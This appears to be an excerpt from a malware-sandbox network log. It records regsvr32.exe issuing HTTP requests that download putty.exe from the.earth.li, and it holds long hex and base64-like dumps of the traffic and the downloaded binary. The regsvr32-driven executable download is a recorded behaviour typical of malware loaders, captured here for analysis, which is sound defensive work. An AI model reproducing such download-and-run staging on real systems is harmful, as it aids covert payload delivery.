2022-01-30 12:43:18 UTC	792	IN	Data Raw: 31 55 58 73 79 56 30 34 4f 53 51 59 51 46 41 41 41 41 47 34 4c 42 68 41 50 41 41 41 41 0d 0a 41 6c 4e 31 55 58 34 79 56 30 34 74 53 51 59 51 46 77 41 41 41 49 38 4c 42 68 41 58 41 41 41 41 2f 56 4e 31 55 57 67 79 56 30 37 4d 53 51 59 51 47 67 41 41 41 4b 77 4c 42 68 41 55 41 41 41 41 0d 0a 33 46 4e 31 55 58 51 79 56 30 37 72 53 51 59 51 41 41 41 41 41 4d 30 4c 42 68 41 52 41 41 41 41 76 31 4e 31 55 58 63 79 56 30 36 4b 53 51 59 51 49 41 41 41 41 4f 49 4c 42 68 41 50 41 41 41 41 0d 0a 6e 6c 4e 31 55 55 6f 79 56 30 36 70 53 51 59 51 49 77 41 41 41 41 4d 4d 42 68 41 72 41 41 41 41 65 56 52 31 55 55 6f 33 78 46 64 78 51 67 41 41 41 47 30 48 45 41 6f 41 41 41 41 50 41 41 41 41 0d 0a 62 56 68 7a 51 57 67 79 56 30 35 58 51 67 41 41 41 51 41 41 41 50 58 2f 2f 2f Data Ascii: 1UXsyV04OSQYQFAAAAG4LBhAPAAAAAlN1UX4yV04tSQYQFwAAAI8LBhAXAAAA/VN1UWgyV07MSQYQGgAAAKwLBhAUAAAA3FN1UXQyV07rSQYQAAAAAM0LBhARAAAAv1N1UXcyV06KSQYQIAAAAOILBhAPAAAAnlN1UUoyV06pSQYQIwAAAAMMBhArAAAAeVR1UUo3xFdxQgAAAG0HEAoAAAAPAAAAbVhzQWgyV05XQgAAAQAAAPX///
2022-01-30 12:43:18 UTC	808	IN	Data Raw: 41 41 4d 77 77 46 6a 49 2b 4d 70 59 79 0d 0a 33 47 71 31 64 4d 59 45 34 48 5a 78 66 67 41 41 41 46 41 41 41 43 6f 41 41 41 41 4a 4d 59 41 7a 75 32 74 56 64 78 34 45 6b 58 5a 42 65 32 59 37 74 6a 73 47 50 6c 77 2b 41 41 41 50 59 41 41 41 0d 0a 54 56 68 7a 51 63 34 43 6f 58 35 70 63 5a 59 7a 44 6a 5a 6d 4e 72 77 34 42 6a 6c 33 4f 39 59 37 6d 32 64 7a 51 57 68 43 56 30 35 4c 51 67 41 41 6c 6a 41 30 4d 55 77 78 51 44 52 5a 4e 78 59 34 0d 0a 75 32 41 6c 65 37 34 4a 6b 58 4e 58 77 67 41 41 48 41 41 41 41 41 77 77 52 6a 4a 5a 4e 43 59 33 7a 6d 44 51 65 31 51 4f 30 58 4e 78 66 4d 59 2b 41 4a 41 41 41 45 49 41 41 41 42 70 4d 4a 59 79 0d 0a 67 6d 75 48 63 6d 45 47 51 6e 70 4e 64 6c 67 32 58 54 62 33 4e 76 59 32 4a 6a 6d 77 4f 63 51 35 53 32 4b 79 65 36 34 49 63 58 Data Ascii: AAMwwFjI+MpYy3Gq1dMYE4HZxfgAAAFAAACoAAAAJMYAzu2tVdx4EkXZBe2Y7tjsGPlw+AAAPYAAATVhzQc4CoX5pcZYzDjZmNrw4Bjl3O9Y7m2dzQWhCV05LQgAAljA0MUwxQDRZNxY4u2Ale74JkXNXwgAAHAAAAAwwRjJZNCY3zmDQe1QO0XNxfMY+AJAAAEIAAABpMJYygmuHcmEGQnpNdlg2XTb3NvY2JjmwOcQ5S2Kye64IcX
2022-01-30 12:43:18 UTC	824	IN	Data Raw: 57 66 62 66 74 67 4e 37 33 47 58 66 63 67 2f 30 44 2f 59 50 2b 6f 2f 36 44 2f 2f 50 2f 67 2f 62 61 68 31 51 55 51 7a 56 30 35 58 63 67 67 77 45 44 41 59 4d 43 6f 77 4b 44 41 2f 4d 44 67 77 0d 0a 4c 57 67 37 63 54 67 43 44 33 34 33 63 6d 67 77 63 44 42 34 4d 49 6f 77 69 44 43 66 4d 4a 67 77 7a 57 6a 62 63 64 67 43 37 33 36 58 63 73 67 77 30 44 44 59 4d 4f 6f 77 36 44 44 2f 4d 50 67 77 0d 0a 62 57 6c 37 63 48 67 44 54 33 39 33 63 79 67 78 4d 44 45 34 4d 55 6f 78 53 44 46 66 4d 56 67 78 44 57 6b 62 63 42 67 44 4c 33 2f 58 63 34 67 78 6b 44 47 59 4d 61 6f 78 71 44 47 2f 4d 62 67 78 0d 0a 72 57 6d 37 63 4c 67 44 6a 33 2b 33 63 2b 67 78 38 44 48 34 4d 51 6f 79 43 44 49 66 4d 68 67 79 54 57 70 62 63 31 67 41 62 33 77 58 63 45 67 79 55 44 4a 59 4d 6d 6f 79 61 44 Data Ascii: WfbftgN73GXfcg/0D/YP+o/6D//P/g/bah1QUQzV05XcggwEDAYMCowKDA/MDgwLWg7cTgCD343cmgwcDB4MIowiDCfMJgwzWjbcdgC736Xcsgw0DDYMOow6DD/MPgwbWl7cHgDT393cygxMDE4MUoxSDFfMVgxDWkbcBgDL3/Xc4gxkDGYMaoxqDG/MbgxrWm7cLgDj3+3c+gx8DH4MQoyCDIfMhgyTWpbc1gAb3wXcEgyUDJYMmoyaD

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.3	49837	93.93.131.124	443	C:\Windows\SysWOW64\regsvr32.exe

Timestamp	kBytes transferred	Direction	Data
2022-01-30 12:43:46 UTC	829	OUT	GET /~sgtatham/putty/latest/w64/putty.exe HTTP/1.1 Host: the.earth.li Cache-Control: no-cache
2022-01-30 12:43:46 UTC	829	IN	HTTP/1.1 302 Found Date: Sun, 30 Jan 2022 12:43:46 GMT Server: Apache Location: https://the.earth.li/~sgtatham/putty/0.76/w64/putty.exe Content-Length: 302 Connection: close Content-Type: text/html; charset=iso-8859-1
2022-01-30 12:43:46 UTC	829	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 74 68 65 2e 65 61 72 74 68 2e 6c 69 2f 7e 73 67 74 61 74 68 61 6d 2f 70 75 74 74 79 2f 30 2e 37 36 2f 77 36 34 2f 70 75 74 74 79 2e 65 78 65 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="https://the.earth.li/~sgtatham/putty/0.76/w64/putty.exe">here</a>.</p><hr><address>Apache Server at

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.2.3	49838	93.93.131.124	443	C:\Windows\SysWOW64\regsvr32.exe

Timestamp	kBytes transferred	Direction	Data
2022-01-30 12:43:46 UTC	829	OUT	GET /~sgtatham/putty/0.76/w64/putty.exe HTTP/1.1 Host: the.earth.li Cache-Control: no-cache Connection: Keep-Alive
2022-01-30 12:43:46 UTC	829	IN	HTTP/1.1 200 OK Date: Sun, 30 Jan 2022 12:43:46 GMT Server: Apache Last-Modified: Sat, 10 Jul 2021 09:55:27 GMT ETag: "136ee8-5c6c1e34a2f22" Accept-Ranges: bytes Content-Length: 1273576 Connection: close Content-Type: application/x-msdos-program
2022-01-30 12:43:46 UTC	829	IN	Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 64 86 07 00 bb 6d e9 60 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 0e 00 00 6a 0a 00 00 b6 08 00 00 00 00 00 40 45 08 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 b0 13 00 00 04 00 00 7c 45 14 00 02 00 60 81 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEdm`"j@E@\|E`
2022-01-30 12:43:46 UTC	837	IN	Data Raw: 00 f6 05 9d 07 0b 00 02 0f 85 b6 00 00 00 45 85 e4 0f 85 d8 f4 ff ff 4c 89 f1 ba 17 00 00 00 41 b0 01 e8 1f 10 00 00 bd 01 00 00 00 e9 ed fa ff ff bd 01 00 00 00 45 85 e4 0f 88 20 05 00 00 f6 05 5f 07 0b 00 02 0f 85 04 05 00 00 45 85 e4 0f 85 9a f4 ff ff 4c 89 f1 ba 22 00 00 00 45 31 c0 e8 e0 10 00 00 48 8d 15 08 43 0c 00 48 89 f9 e8 3d 0e 09 00 bd 01 00 00 00 85 c0 0f 85 cb fa ff ff eb 24 bd 01 00 00 00 45 85 e4 0f 88 ce 04 00 00 f6 05 0d 07 0b 00 02 0f 85 b2 04 00 00 45 85 e4 0f 85 48 f4 ff ff 4c 89 f1 ba 22 00 00 00 41 b8 03 00 00 00 e8 8b 10 00 00 bd 01 00 00 00 e9 88 fa ff ff 48 8d 0d 86 d5 0b 00 48 89 fa e8 75 b4 06 00 bd 01 00 00 00 e9 82 04 00 00 4d 85 ed 0f 84 63 04 00 00 bd 02 00 00 00 45 85 e4 0f 88 6b 04 00 00 f6 05 aa 06 0b 00 02 0f 85 4f 04 Data Ascii: ELAE _EL"E1HCH=$EEHL"AHHuMcEkO
2022-01-30 12:43:46 UTC	845	IN	Data Raw: 30 40 88 68 3a 48 8b 47 30 c7 40 14 04 00 00 00 48 8b 15 5a 36 0a 00 48 8d 0d dc af 0b 00 e8 81 fc 05 00 48 89 c6 48 8d 15 2f b1 0b 00 4c 89 f9 49 89 c0 e8 2f 81 00 00 48 89 f1 e8 83 d9 00 00 44 88 b4 24 bf 00 00 00 45 84 f6 4c 89 bc 24 c0 00 00 00 74 0c 4c 8d 0d 35 8b 0b 00 e9 e4 03 00 00 ba 28 00 00 00 4c 89 f9 e8 7d 83 00 00 49 89 c6 0f 11 30 0f 11 70 10 4c 89 68 20 48 8d 15 d9 b0 0b 00 4c 8d 05 9c 74 0b 00 4c 8d 0d 17 a5 0b 00 4c 89 f9 e8 99 81 00 00 48 89 c5 48 89 c1 ba 02 00 00 00 41 b8 4b 00 00 00 41 b9 19 00 00 00 e8 47 83 00 00 31 c9 e8 dd 7d 00 00 48 89 c6 31 c9 e8 d3 7d 00 00 48 89 c3 4c 8d 25 ba cf 0b 00 4c 89 e1 e8 c4 7d 00 00 48 89 74 24 38 48 89 5c 24 30 48 8d 0d 70 57 00 00 48 89 4c 24 28 48 89 44 24 20 48 8d 15 78 3c 0c 00 48 89 e9 41 b0 Data Ascii: 0@h:HG0@HZ6HHH/LI/HD$EL$tL5(L}I0pLh HLtLLHHAKAG1}H1}HL%L}Ht$8H\$0HpWHL$(HD$ Hx<HA
2022-01-30 12:43:46 UTC	853	IN	Data Raw: ff 4c 89 7c 24 68 48 89 74 24 60 48 8d 0d 89 1a 0c 00 48 89 4c 24 50 48 89 7c 24 48 b9 75 00 00 00 89 4c 24 40 48 8d 0d c5 62 0b 00 48 89 4c 24 38 48 89 6c 24 30 48 8d 0d 58 da ff ff 48 89 4c 24 28 48 89 44 24 20 c7 44 24 58 70 00 00 00 48 8d 15 0b f5 0b 00 48 89 d9 45 31 c0 41 b9 01 00 00 00 e8 c7 66 00 00 b9 97 00 00 00 e8 e8 5e 00 00 48 89 c6 48 8d 0d e4 ab 0b 00 e8 dc 5e 00 00 48 89 74 24 28 4c 89 64 24 20 48 8d 15 30 9c 0b 00 48 89 d9 41 b0 64 49 89 c1 e8 29 6b 00 00 b9 98 00 00 00 e8 b0 5e 00 00 48 89 c6 48 8d 0d 1e 4f 0b 00 e8 a4 5e 00 00 48 89 74 24 28 4c 89 64 24 20 48 8d 15 44 bc 0b 00 48 89 d9 41 b0 38 49 89 c1 e8 f1 6a 00 00 4c 8d 35 05 8a 0b 00 4c 8d 05 8f ab 0b 00 4c 89 e9 4c 89 f2 e8 37 61 00 00 4c 8d 0d b7 ac 0b 00 4c 89 e9 4c 89 f2 4c 8d Data Ascii: L\|$hHt$`HHL$PH\|$HuL$@HbHL$8Hl$0HXHL$(HD$ D$XpHHE1Af^HH^Ht$(Ld$ H0HAdI)k^HHO^Ht$(Ld$ HDHA8IjL5LLL7aLLLL
2022-01-30 12:43:46 UTC	861	IN	Data Raw: 4c 00 00 b9 1f 00 00 00 e8 0c 40 00 00 48 89 c6 48 8d 0d 64 62 0b 00 e8 00 40 00 00 48 89 74 24 28 4c 89 64 24 20 48 8d 15 34 e5 0b 00 48 89 f9 45 31 c0 49 89 c1 e8 4d 4c 00 00 b9 21 00 00 00 e8 d4 3f 00 00 48 89 c6 48 8d 0d bc 2a 0b 00 e8 c8 3f 00 00 48 89 74 24 40 4c 8d 35 dd be ff ff 4c 89 74 24 38 48 89 44 24 30 48 8d 05 34 94 0b 00 48 89 44 24 28 c6 44 24 20 00 48 8d 15 66 d7 0b 00 4c 8d 0d c0 1f 0c 00 48 89 f9 41 b0 6b e8 b7 4a 00 00 48 8d 35 28 c3 0b 00 4c 8d 05 88 6f 0b 00 4c 89 e9 48 89 f2 e8 3a 42 00 00 4c 8d 05 da 7e 0b 00 4c 89 e9 48 89 f2 45 31 c9 e8 f0 42 00 00 48 89 c7 b9 29 00 00 00 e8 4a 3f 00 00 48 89 c6 48 8d 1d a5 7e 0b 00 48 89 d9 e8 3b 3f 00 00 48 89 74 24 28 4c 89 64 24 20 48 8d 15 fe fa 0b 00 48 89 f9 41 b0 74 49 89 c1 e8 88 4b 00 Data Ascii: L@HHdb@Ht$(Ld$ H4HE1IML!?HH*?Ht$@L5Lt$8HD$0H4HD$(D$ HfLHAkJH5(LoLH:BL~LHE1BH)J?HH~H;?Ht$(Ld$ HHAtIK
2022-01-30 12:43:46 UTC	868	IN	Data Raw: b8 c0 01 00 00 e8 8f 57 08 00 48 8b 46 58 48 63 cf 44 8b 04 c8 4c 89 f1 ba 80 00 00 00 48 83 c4 28 5b 5f 5e 41 5e e9 1a 94 ff ff 90 48 83 c4 28 5b 5f 5e 41 5e c3 31 ff 39 cf 75 12 31 ff 4c 89 f1 ba 80 00 00 00 45 31 c0 e8 f7 93 ff ff 48 89 f1 48 89 da 41 89 f8 48 83 c4 28 5b 5f 5e 41 5e e9 c1 fa 05 00 41 56 56 57 55 53 48 83 ec 30 4d 89 c6 48 89 d7 48 89 cb 48 8b 05 62 d8 0c 00 48 31 e0 48 89 44 24 28 41 83 f9 02 0f 84 c1 00 00 00 45 85 c9 0f 85 9f 00 00 00 48 89 d9 48 89 fa e8 26 04 06 00 80 7b 41 00 74 5d 48 89 d9 48 89 fa e8 c8 fc 05 00 4c 8d 05 ba ed 0b 00 48 89 d9 48 89 fa e8 49 fd 05 00 48 8d 6c 24 24 48 89 e9 e8 6c 36 07 00 48 89 c6 83 7d 00 00 7e 22 31 ed 48 89 f1 89 ea e8 b4 37 07 00 48 89 d9 48 89 fa 49 89 c0 e8 19 fd 05 00 ff c5 3b 6c 24 24 7c Data Ascii: WHFXHcDLH([_^A^H([_^A^19u1LE1HHAH([_^A^AVVWUSH0MHHHbH1HD$(AEHH&{At]HHLHHIHl$$Hl6H}~"1H7HHI;l$$\|
2022-01-30 12:43:46 UTC	876	IN	Data Raw: 0f 8c 4e fe ff ff 48 c7 86 f0 00 00 00 00 00 00 00 c7 86 fc 00 00 00 00 00 00 00 e9 34 fe ff ff 45 31 f6 eb 4a 48 8b 4e 10 48 8b 01 48 8d 15 d0 34 0b 00 eb 2e 48 8b 4e 10 48 8b 01 48 8d 15 c8 03 0b 00 eb 1e 48 8b 4e 10 48 8b 01 48 8d 15 cd 30 0b 00 eb 0e 48 8b 4e 10 48 8b 01 48 8d 15 57 d6 0b 00 41 b8 40 1f 00 00 45 31 c9 ff 50 08 48 8b 8c 24 70 01 00 00 48 31 e1 e8 72 78 07 00 44 89 f0 48 81 c4 78 01 00 00 5b 5d 5f 5e 41 5c 41 5d 41 5e 41 5f c3 41 56 56 57 53 48 81 ec 38 02 00 00 48 89 ce 48 8b 05 f5 b8 0c 00 48 31 e0 48 89 84 24 30 02 00 00 48 8b 89 e8 00 00 00 ba 10 00 00 00 e8 68 6e ff ff 48 89 c7 48 8b 8e e8 00 00 00 ba 11 00 00 00 e8 54 6e ff ff 80 3f 00 75 09 80 38 00 0f 84 91 00 00 00 4c 8d 74 24 27 41 c7 46 f9 01 02 11 01 66 41 c7 46 fd 85 02 48 Data Ascii: NH4E1JHNHH4.HNHHHNHH0HNHHWA@E1PH$pH1rxDHx[]_^A\A]A^A_AVVWSH8HHH1H$0HhnHHTn?u8Lt$'AFfAFH
2022-01-30 12:43:46 UTC	884	IN	Data Raw: e8 e5 72 00 00 48 89 c3 41 b8 02 00 00 00 48 89 c1 48 89 c2 e8 af 70 00 00 4c 8b 06 48 89 d9 4c 89 e2 e8 4e 90 00 00 48 89 c7 48 8b 4e 08 48 89 c2 e8 a2 94 00 00 48 89 46 20 4c 89 f1 e8 4a 6d 00 00 4c 89 e1 e8 42 6d 00 00 48 89 d9 e8 3a 6d 00 00 48 89 f9 e8 32 6d 00 00 48 89 f0 48 83 c4 28 5b 5f 5e 41 5c 41 5e 41 5f c3 56 57 53 48 83 ec 20 48 89 d6 48 89 cf b9 01 00 00 00 ba 18 00 00 00 45 31 c0 e8 7f 3c 00 00 48 89 c3 48 89 78 10 0f 57 c0 0f 11 00 48 8b 4f 08 48 89 f2 e8 35 94 00 00 48 89 03 48 8b 4f 08 e8 84 93 00 00 48 89 c1 e8 33 72 00 00 48 89 43 08 48 89 d8 48 83 c4 20 5b 5f 5e c3 56 57 53 48 83 ec 20 48 89 ce 48 8b 59 10 b9 01 00 00 00 ba 18 00 00 00 45 31 c0 e8 23 3c 00 00 48 89 c7 48 89 58 10 0f 57 c0 0f 11 00 48 8b 0e e8 ef 71 00 00 48 89 07 48 Data Ascii: rHAHHpLHLNHHNHHF LJmLBmH:mH2mHH([_^A\A^A_VWSH HHE1<HHxWHOH5HHOH3rHCHH [_^VWSH HHYE1#<HHXWHqHH
2022-01-30 12:43:46 UTC	892	IN	Data Raw: 8b 4e 40 48 8b 01 48 89 f2 ff 50 10 48 89 f1 e8 2f 1e 00 00 41 83 3f 01 75 19 48 8d 0d fe cb 0b 00 48 8d 15 2b bc 0b 00 41 b8 8a 00 00 00 e8 a6 f9 07 00 49 8d 7e 10 48 89 f9 e8 aa 48 05 00 48 85 c0 74 44 48 8d 5c 24 30 48 8d 74 24 20 48 89 d9 48 89 fa e8 3d 4a 05 00 0f 10 44 24 30 0f 29 44 24 20 4c 89 f1 48 89 f2 e8 9f 00 00 00 48 8b 54 24 38 48 89 f9 e8 55 49 05 00 48 89 f9 e8 66 48 05 00 48 85 c0 75 c6 41 83 7e 50 00 7e 0e 41 83 3f 02 75 08 49 8b 0e e8 58 1c 08 00 48 8b 8c 24 78 01 00 00 48 31 e1 e8 c4 39 07 00 90 48 81 c4 80 01 00 00 5b 5f 5e 41 5e 41 5f c3 48 83 ec 48 48 8b 05 59 7a 0c 00 48 31 e0 48 89 44 24 40 88 54 24 3f 8b 41 50 85 c0 7e 1f 44 39 c0 75 1a 48 8d 44 24 3f 48 8d 54 24 28 48 89 02 48 c7 42 08 01 00 00 00 e8 13 00 00 00 48 8b 4c 24 40 Data Ascii: N@HHPH/A?uHH+AI~HHHtDH\$0Ht$ HH=JD$0)D$ LHHT$8HUIHfHHuA~P~A?uIXH$xH19H[_^A^A_HHHYzH1HD$@T$?AP~D9uHD$?HT$(HHBHL$@
2022-01-30 12:43:46 UTC	900	IN	Data Raw: 74 42 48 89 f9 4c 89 ea 45 31 c0 e8 79 fe ff ff 49 89 c4 4d 85 f6 74 3d 4d 0f af f5 4c 89 e1 4c 89 fa 4d 89 f0 e8 67 2c 07 00 4c 89 f9 4c 89 f2 e8 dc 80 06 00 4d 85 ff 74 1b 4c 89 f9 e8 37 06 08 00 eb 11 4c 89 f9 48 89 fa 4d 89 e8 e8 70 fe ff ff 49 89 c4 48 89 3b 4d 89 e7 4c 89 f8 48 83 c4 28 5b 5d 5f 5e 41 5c 41 5d 41 5e 41 5f c3 cc cc 41 ba ff ff ff ff 41 b9 6a 02 00 00 4c 8d 05 8d 68 09 00 43 8d 14 0a 89 d0 c1 e8 1f 01 d0 d1 f8 48 63 d0 48 8d 14 52 41 39 0c 90 7e 05 41 89 c1 eb 0a 41 89 c2 41 39 4c 90 04 7d 12 44 89 c8 44 29 d0 83 f8 01 7f cc b8 00 00 04 00 eb 0c 41 8a 4c 90 08 b8 01 00 00 00 d3 e0 a8 78 0f 95 c0 c3 41 57 41 56 41 55 41 54 56 57 55 53 45 85 c0 0f 8e 04 02 00 00 45 89 c0 b8 10 00 00 00 45 31 d2 4c 8d 1d 49 65 09 00 be df f9 ff ff 41 b9 Data Ascii: tBHLE1yIMt=MLLMg,LLMtL7LHMpIH;MLH([]_^A\A]A^A_AAjLhCHcHRA9~AAA9L}DD)ALxAWAVAUATVWUSEEE1LIeA
2022-01-30 12:43:46 UTC	908	IN	Data Raw: ff 4d fe ff ff 4d fe ff ff 4d fe ff ff 4d fe ff ff 99 f9 ff ff a4 f9 ff ff ce ef ff ff 1f f6 ff ff 01 fe ff ff 01 fe ff ff 01 fe ff ff 01 fe ff ff 01 fe ff ff 01 fe ff ff 01 fe ff ff 01 fe ff ff 01 fe ff ff 01 fe ff ff 01 fe ff ff 01 fe ff ff 01 fe ff ff 01 fe ff ff 01 fe ff ff 01 fe ff ff 01 fe ff ff 01 fe ff ff 01 fe ff ff 2a f6 ff ff 35 f6 ff ff 01 fe ff ff 01 fe ff ff 40 f6 ff ff 4b f6 ff ff 56 f6 ff ff 61 f6 ff ff 6c f6 ff ff 77 f6 ff ff 82 f6 ff ff 8d f6 ff ff 01 fe ff ff 01 fe ff ff 01 fe ff ff 01 fe ff ff 01 fe ff ff 01 fe ff ff 98 f6 ff ff a3 f6 ff ff 01 fe ff ff 01 fe ff ff 01 fe ff ff 01 fe ff ff ae f6 ff ff b9 f6 ff ff c4 f6 ff ff cf f6 ff ff da f6 ff ff e5 f6 ff ff f0 f6 ff ff fb f6 ff ff 06 f7 ff ff 11 f7 ff ff 1c f7 ff ff 27 f7 ff ff 01 fe Data Ascii: MMMM*5@KValw'
2022-01-30 12:43:46 UTC	915	IN	Data Raw: c9 4d 39 c8 76 0a 48 8b 41 08 4e 8b 1c c8 eb 03 45 31 db 31 c0 4c 01 d2 0f 92 c0 4c 01 da 48 83 d0 00 49 ff c1 48 c7 c2 ff ff ff ff 49 89 c2 4d 39 c1 72 cd c3 56 57 4c 8b 0a 4c 8b 11 4d 39 ca 4d 89 cb 4d 0f 47 da 45 31 c0 4d 85 db 74 32 31 c0 49 39 c2 76 0a 48 8b 71 08 48 8b 34 c6 eb 02 31 f6 49 39 c1 76 0a 48 8b 7a 08 48 8b 3c c7 eb 02 31 ff 48 31 f7 49 09 f8 48 ff c0 49 39 c3 75 d0 4c 89 c1 48 d1 e9 41 83 e0 01 31 c0 49 09 c8 0f 94 c0 5f 5e c3 4c 8b 09 45 31 c0 45 31 db 4d 39 d9 76 0a 48 8b 41 08 4e 8b 14 d8 eb 03 45 31 d2 49 31 d2 4d 09 d0 49 ff c3 ba 00 00 00 00 4d 39 cb 72 db 4c 89 c1 48 d1 e9 41 83 e0 01 31 c0 49 09 c8 0f 94 c0 c3 56 57 53 48 83 ec 40 48 89 d6 48 89 cf 48 8b 0a 48 8b 07 48 39 c8 48 0f 47 c8 48 ff c1 e8 bc ee ff ff 48 89 c3 48 8b 10 Data Ascii: M9vHANE11LLHIHIM9rVWLLM9MMGE1Mt21I9vHqH41I9vHzH<1H1IHI9uLHA1I_^LE1E1M9vHANE1I1MIM9rLHA1IVWSH@HHHHH9HGHHH
2022-01-30 12:43:46 UTC	923	IN	Data Raw: 49 8b 55 00 49 8b 4d 08 48 8b 19 83 e3 01 48 f7 db 0f 11 74 24 28 48 89 5c 24 20 4d 89 e8 4d 89 f9 e8 7f df ff ff 49 8b 16 49 8b 4e 08 0f 11 74 24 28 48 89 5c 24 20 4d 89 f0 49 89 f9 e8 63 df ff ff 41 b8 01 00 00 00 4c 89 e9 4c 89 ea e8 41 da ff ff 48 f7 dd 49 8b 16 49 8b 4e 08 0f 11 74 24 28 48 89 6c 24 20 4d 89 f0 4d 89 e9 e8 33 df ff ff 41 b8 01 00 00 00 48 89 f9 48 89 fa e8 2c e8 ff ff 48 8b 17 48 8b 4f 08 0f 11 74 24 28 48 89 6c 24 20 49 89 f8 4d 89 f9 e8 06 df ff ff 48 89 f9 4c 89 fa 41 89 f0 e8 8d d1 ff ff 4c 89 e9 4c 89 f2 41 89 f0 e8 7f d1 ff ff 8b 6c 24 58 31 f5 49 83 c4 fe 48 8b 4c 24 48 48 83 c1 ff 0f 82 d5 fe ff ff 48 8b 5c 24 60 48 8b 13 48 8b 4b 08 41 be 01 00 00 00 4c 89 74 24 30 48 c7 c6 ff ff ff ff 48 89 74 24 28 48 89 74 24 20 4c 8b 64 Data Ascii: IUIMHHt$(H\$ MMIINt$(H\$ MIcALLAHIINt$(Hl$ MM3AHH,HHOt$(Hl$ IMHLALLAl$X1IHL$HHH\$`HHKALt$0HHt$(Ht$ Ld
2022-01-30 12:43:46 UTC	931	IN	Data Raw: 5e 41 5f c3 41 57 41 56 41 54 56 57 55 53 48 83 ec 60 45 89 cf 4c 89 c0 49 89 d6 48 89 cb 8b 8c 24 c8 00 00 00 48 8b 15 b5 de 0b 00 48 31 e2 48 89 54 24 58 4c 8d 44 24 50 49 c7 00 00 00 00 00 4c 8b 4b 08 0f 57 c0 0f 11 44 24 28 89 4c 24 20 48 89 c1 44 89 fa e8 65 0d 00 00 48 89 c5 48 89 c1 e8 6d 27 06 00 48 85 c0 74 22 48 89 c1 e8 d3 a4 04 00 48 89 c7 48 89 e9 e8 25 16 06 00 48 8b 4c 24 50 e8 7b 81 ff ff e9 cf 00 00 00 4c 8b a4 24 c0 00 00 00 31 ff b9 01 00 00 00 ba 58 00 00 00 45 31 c0 e8 e0 80 ff ff 48 89 c6 48 89 78 20 48 89 78 30 48 83 c0 48 49 89 06 48 8d 46 40 48 8d 0d 93 09 09 00 48 89 4e 40 89 7e 50 48 8d 0d ad 09 09 00 48 89 4e 48 66 c7 46 18 01 01 4c 89 26 48 8b 0b 48 89 4e 08 89 7e 1c 48 8b 4b 08 48 8b 54 24 50 48 89 4c 24 40 48 89 44 24 38 40 Data Ascii: ^A_AWAVATVWUSH`ELIH$HH1HT$XLD$PILKWD$(L$ HDeHHm'Ht"HHH%HL$P{L$1XE1HHx Hx0HHIHF@HHN@~PHHNHfFL&HHN~HKHT$PHL$@HD$8@
2022-01-30 12:43:46 UTC	939	IN	Data Raw: 15 6c 36 0a 00 e9 60 01 00 00 49 8b 77 10 4d 8b b7 d8 00 00 00 49 8b 9f e0 00 00 00 48 8b 06 48 8b 78 20 48 8b 8c 24 38 02 00 00 48 31 e1 e8 be 7e 06 00 48 89 f1 4c 89 f2 49 89 d8 48 89 f8 48 81 c4 40 02 00 00 5b 5f 5e 41 5c 41 5d 41 5e 41 5f 48 ff e0 4c 89 f9 e8 b8 03 ff ff 89 c7 85 c0 0f 85 d8 01 00 00 41 8b 87 a4 00 00 00 83 c0 fe 83 f8 04 0f 87 a6 01 00 00 48 8d 0d d9 04 00 00 48 63 04 81 48 01 c8 ff e0 49 8d 7f 78 48 89 f9 e8 d4 8c 04 00 48 83 f8 05 0f 82 9a 01 00 00 48 8d 74 24 2b 41 b8 05 00 00 00 48 89 f9 48 89 f2 e8 7a 8e 04 00 80 3e 05 0f 85 b0 02 00 00 0f be 5c 24 2c 85 db 0f 84 e0 02 00 00 48 b8 65 72 72 6f 72 3a 20 00 48 89 44 24 36 48 b8 50 72 6f 78 79 20 65 72 48 89 44 24 30 8d 43 ff 83 f8 07 0f 87 1d 03 00 00 48 8d 0d 71 04 00 00 48 63 04 Data Ascii: l6`IwMIHHx H$8H1~HLIHH@[_^A\A]A^A_HLAHHcHIxHHHt$+AHHz>\$,Herror: HD$6HProxy erHD$0CHqHc
